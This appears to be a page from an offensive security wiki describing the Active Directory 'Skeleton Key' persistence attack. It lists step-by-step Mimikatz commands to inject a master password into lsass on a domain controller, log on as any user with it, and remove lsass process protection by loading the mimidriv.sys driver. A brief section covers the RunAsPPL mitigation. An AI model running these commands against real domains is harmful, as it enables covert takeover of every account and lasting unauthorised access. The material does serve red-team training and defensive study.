Skeleton Keys

This is a persistence technique that allows you to log on to a Domain Controller as any user with a single password.

'Sketelon Keys' are pieces of malware injected into lsass on the Domain Controller that allow to logon as any user with the same 'master' password. Detection is difficult because users can log on with their own passwords in addition to the skeleton key password.

This makes it seem like a very effective persistence technique. However, a reboot of the DC will get rid of the injected malware and your key will no longer work. This means you would have to create a new skeleton key again.

Domain Admin privileges are required to perform this.

Creating a Key and Injecting it With Mimikatz

The default skeleton key password is "mimikatz".

Step 1 - Inject the Key

Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <dc.domain>

Step 2 - From Another PowerShell Terminal, Issue Commands on the DC

$cred = Get-Credential domain\Administrator # then enter the password "mimikatz" in the prompt
Invoke-Command -ComputerName <dc.domain> -Credential $cred -ScriptBlock {whoami}

  • If RDP or WinRM is enabled, you can also logon remotely with the skeleton key password.

In Case lsass is Running as a Protected Process

  • It is better to try another persistence method if lsass is running as a protected process because this will create a lot of noise.

Step 1

  • Upload the Mimikatz driver (mimidriv.sys) to the disk of the target DC

Step 2

# mimikatz.exe
mimikatz # privilege::debug
mimikatz # !+ 
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-

Step 3

  • Issue Commands on the DC as Any User You Wish With the Skeleton Key Password

Mitigations

  • Running LSASS as a protected process light (PPL) will force the attack to have to load a kernel driver onto disk, increasing the chances of detection. It can be set with the following command:

New-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name RunAsPPL -Value 1 -Verbose

# After reboot -> verify
Get-WinEvent -FilterHashtable @{Logname='System';ID=12} | ?{$_.message -like "*protected process*"}

However, test that all the drivers and plugins load before implementing this as a protected process.

If this works, it would also disable many other attacks that inject code into or patch LSASS, like Pass-the-Hash, credential dumping, or creating custom SSPs with Mimikatz.

PreviousSilver TicketsNextPowershell Remoting

Last updated